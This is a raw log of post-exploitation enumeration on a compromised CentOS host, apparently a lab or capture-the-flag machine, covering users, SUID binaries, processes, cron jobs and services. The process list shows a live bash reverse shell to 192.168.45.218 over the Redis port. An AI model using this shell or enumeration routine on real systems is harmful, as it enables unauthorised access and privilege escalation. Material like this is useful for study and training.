System/Kernel
[pablo@sybaris /]$ uname -a ; cat /etc/*release
Linux sybaris 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.8.2003 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
CentOS Linux release 7.8.2003 (Core)
CentOS Linux release 7.8.2003 (Core)3.10.0-1127.19.1.el7.x86_64x86_64CentOS Linux release 7.8.2003 (Core)
Networks
[pablo@sybaris /]$ ip route ; arp -a
default via 192.168.185.254 dev ens192
169.254.0.0/16 dev ens192 scope link metric 1003
192.168.185.0/24 dev ens192 proto kernel scope link src 192.168.185.93
gateway (192.168.185.254) at 00:50:56:9e:72:00 [ether] on ens192[pablo@sybaris /]$ netstat -antup4
netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN 909/redis-server 0.
tcp 0 0 192.168.185.93:6379 192.168.45.218:57214 ESTABLISHED 909/redis-server 0.
tcp 0 141 192.168.185.93:34240 192.168.45.218:6379 ESTABLISHED 1740/bash
udp 0 0 192.168.185.93:57754 131.111.8.63:123 ESTABLISHED -
udp 0 0 192.168.185.93:39756 131.111.8.61:123 ESTABLISHED -
udp 0 0 192.168.185.93:54475 77.104.162.218:123 ESTABLISHED -
udp 0 0 192.168.185.93:46920 91.109.118.94:123 ESTABLISHED -
udp 0 0 127.0.0.1:323 0.0.0.0:* - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
Users & Groups
[pablo@sybaris /]$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
pablo:x:1000:1000::/home/pablo:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
total 0
0 dr-xr-xr-x. 17 root root 244 Sep 4 2020 ..
0 drwxr-xr-x. 2 pablo pablo 100 Sep 4 2020 pablo
0 drwxr-xr-x. 3 root root 19 Sep 4 2020 .pablo
[pablo@sybaris /]$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)
uid=48(apache) gid=48(apache) groups=48(apache)uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)
SUIDs
[pablo@sybaris /]$ find / -perm -04000 -ls -type f 2>/dev/null
12996561 76 -rwsr-xr-x 1 root root 73888 Aug 8 2019 /usr/bin/chage
12996562 80 -rwsr-xr-x 1 root root 78408 Aug 8 2019 /usr/bin/gpasswd
12997277 24 -rws--x--x 1 root root 23968 Apr 1 2020 /usr/bin/chfn
12997280 24 -rws--x--x 1 root root 23880 Apr 1 2020 /usr/bin/chsh
12996565 44 -rwsr-xr-x 1 root root 41936 Aug 8 2019 /usr/bin/newgrp
12997360 32 -rwsr-xr-x 1 root root 32128 Apr 1 2020 /usr/bin/su
12997121 144 ---s--x--x 1 root root 147336 Apr 1 2020 /usr/bin/sudo
12997345 44 -rwsr-xr-x 1 root root 44264 Apr 1 2020 /usr/bin/mount
12997582 32 -rwsr-xr-x 1 root root 31984 Apr 1 2020 /usr/bin/umount
13047813 60 -rwsr-xr-x 1 root root 57656 Aug 8 2019 /usr/bin/crontab
13047571 24 -rwsr-xr-x 1 root root 23576 Apr 1 2020 /usr/bin/pkexec
12584827 28 -rwsr-xr-x 1 root root 27856 Mar 31 2020 /usr/bin/passwd
12875325 32 -rwsr-xr-x 1 root root 32096 Oct 30 2018 /usr/bin/fusermount
7006 36 -rwsr-xr-x 1 root root 36272 Apr 1 2020 /usr/sbin/unix_chkpwd
7004 12 -rwsr-xr-x 1 root root 11232 Apr 1 2020 /usr/sbin/pam_timestamp_check
298708 12 -rwsr-xr-x 1 root root 11296 Mar 31 2020 /usr/sbin/usernetctl
4375945 16 -rwsr-xr-x 1 root root 15432 Apr 1 2020 /usr/lib/polkit-1/polkit-agent-helper-1
4375928 60 -rwsr-x--- 1 root dbus 57936 Jul 13 2020 /usr/libexec/dbus-1/dbus-daemon-launch-helperSGIDs
[pablo@sybaris /]$ find / -type f -perm -02000 -ls 2>/dev/null
12588038 16 -r-xr-sr-x 1 root tty 15344 Jun 9 2014 /usr/bin/wall
12997588 20 -rwxr-sr-x 1 root tty 19544 Apr 1 2020 /usr/bin/write
13196585 376 ---x--s--x 1 root nobody 382216 Aug 8 2019 /usr/bin/ssh-agent
298703 12 -rwxr-sr-x 1 root root 11224 Mar 31 2020 /usr/sbin/netreport
434195 216 -rwxr-sr-x 1 root postdrop 218560 Apr 1 2020 /usr/sbin/postdrop
434202 260 -rwxr-sr-x 1 root postdrop 264128 Apr 1 2020 /usr/sbin/postqueue
8643993 12 -rwx--s--x 1 root utmp 11192 Jun 9 2014 /usr/libexec/utempter/utempter
4380384 456 ---x--s--x 1 root ssh_keys 465760 Aug 8 2019 /usr/libexec/openssh/ssh-keysignCapabilities
[pablo@sybaris /]$ getcap -r / 2>/dev/null
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep/usr/sbin/suexec = cap_setgid,cap_setuid+ep
Processes
[pablo@sybaris /]$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 125352 3872 ? Ss 09:08 0:00 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root 483 0.0 0.0 39084 2336 ? Ss 09:08 0:00 /usr/lib/systemd/systemd-journald
root 505 0.0 0.0 198572 1344 ? Ss 09:08 0:00 /usr/sbin/lvmetad -f
root 511 0.0 0.0 45020 1940 ? Ss 09:08 0:00 /usr/lib/systemd/systemd-udevd
root 612 0.0 0.0 55532 852 ? S<sl 09:08 0:00 /sbin/auditd
root 635 0.0 0.1 99688 6200 ? Ss 09:08 0:00 /usr/bin/VGAuthService -s
polkitd 637 0.0 0.3 612248 14168 ? Ssl 09:08 0:00 /usr/lib/polkit-1/polkitd --no-debug
dbus 638 0.0 0.0 58240 2460 ? Ss 09:08 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 653 0.0 0.1 314460 7288 ? Ssl 09:08 0:00 /usr/bin/vmtoolsd
root 659 0.0 0.0 26384 1760 ? Ss 09:08 0:00 /usr/lib/systemd/systemd-logind
root 661 0.0 0.0 126388 1580 ? Ss 09:08 0:00 /usr/sbin/crond -n
root 671 0.0 0.0 110208 856 tty1 Ss+ 09:08 0:00 /sbin/agetty --noclear tty1 linux
chrony 675 0.0 0.0 117808 1752 ? S 09:08 0:00 /usr/sbin/chronyd
root 690 0.0 0.2 550264 8816 ? Ssl 09:08 0:00 /usr/sbin/NetworkManager --no-daemon
root 905 0.0 0.6 651120 23352 ? Ss 09:08 0:00 /usr/sbin/httpd -DFOREGROUND
root 907 0.0 0.5 574304 19448 ? Ssl 09:08 0:00 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 908 0.0 0.1 112924 4320 ? Ss 09:08 0:00 /usr/sbin/sshd -D
pablo 909 0.0 0.2 154032 8308 ? Ssl 09:08 0:00 /usr/local/bin/redis-server 0.0.0.0:6379
root 910 0.0 0.0 226744 3544 ? Ssl 09:08 0:00 /usr/sbin/rsyslogd -n
root 912 0.0 0.0 53288 700 ? Ss 09:08 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf
apache 1080 0.0 0.2 651256 10368 ? S 09:08 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1081 0.0 0.2 651256 10368 ? S 09:08 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1082 0.0 0.2 651256 10368 ? S 09:08 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1083 0.0 0.2 651256 10368 ? S 09:08 0:00 /usr/sbin/httpd -DFOREGROUND
apache 1084 0.0 0.2 651256 10368 ? S 09:08 0:00 /usr/sbin/httpd -DFOREGROUND
root 1213 0.0 0.0 89704 2168 ? Ss 09:08 0:00 /usr/libexec/postfix/master -w
postfix 1223 0.0 0.1 89876 4124 ? S 09:08 0:00 qmgr -l -t unix -u
postfix 1674 0.0 0.1 89808 4096 ? S 09:10 0:00 pickup -l -t unix -u
pablo 1739 0.0 0.0 113284 1200 ? S 09:15 0:00 bash -c bash -i >& /dev/tcp/192.168.45.218/6379 0>&1
pablo 1740 0.0 0.0 115544 2044 ? S 09:15 0:00 bash -i
pablo 1860 0.0 0.0 155476 1876 ? R 09:18 0:00 ps -auxwwwpolkitd 637 0.0 0.3 612248 14168 ? Ssl 09:08 0:00 /usr/lib/polkit-1/polkitd --no-debugroot 661 0.0 0.0 126388 1580 ? Ss 09:08 0:00 /usr/sbin/crond -nchrony 675 0.0 0.0 117808 1752 ? S 09:08 0:00 /usr/sbin/chronydroot 905 0.0 0.6 651120 23352 ? Ss 09:08 0:00 /usr/sbin/httpd -DFOREGROUNDpablo 909 0.0 0.2 154032 8308 ? Ssl 09:08 0:00 /usr/local/bin/redis-server 0.0.0.0:6379root 912 0.0 0.0 53288 700 ? Ss 09:08 0:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.confroot 1213 0.0 0.0 89704 2168 ? Ss 09:08 0:00 /usr/libexec/postfix/master -wpostfix 1223 0.0 0.1 89876 4124 ? S 09:08 0:00 qmgr -l -t unix -upostfix 1674 0.0 0.1 89808 4096 ? S 09:10 0:00 pickup -l -t unix -u
Cron & Systemd
[pablo@sybaris /]$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for pablo
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
MAILTO=""
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * root /usr/bin/log-sweeper
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2025-03-29 09:23:25 EDT 3min 40s left n/a n/a systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
1 timers listed.
Pass --all to see loaded but inactive timers, too.LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils
* * * * * root /usr/bin/log-sweeper
Services
[pablo@sybaris /]$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
auditd.service loaded active running Security Auditing Service
chronyd.service loaded active running NTP client/server
crond.service loaded active running Command Scheduler
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
httpd.service loaded active running The Apache HTTP Server
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
NetworkManager.service loaded active running Network Manager
polkit.service loaded active running Authorization Manager
postfix.service loaded active running Postfix Mail Transport Agent
redis.service loaded active running Redis
rsyslog.service loaded active running System Logging Service
sshd.service loaded active running OpenSSH server daemon
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-udevd.service loaded active running udev Kernel Device Manager
tuned.service loaded active running Dynamic System Tuning Daemon
vgauthd.service loaded active running VGAuth Service for open-vm-tools
vmtoolsd.service loaded active running Service for virtual machines hosted on VMware
vsftpd.service loaded active running Vsftpd ftp daemon
dbus.socket loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
26 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.chronyd.servicehttpd.servicepostfix.serviceredis.service
Sudo Version
[pablo@sybaris /]$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23Sudo version 1.8.23
Glibc Version
[pablo@sybaris /]$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (GNU libc) 2.17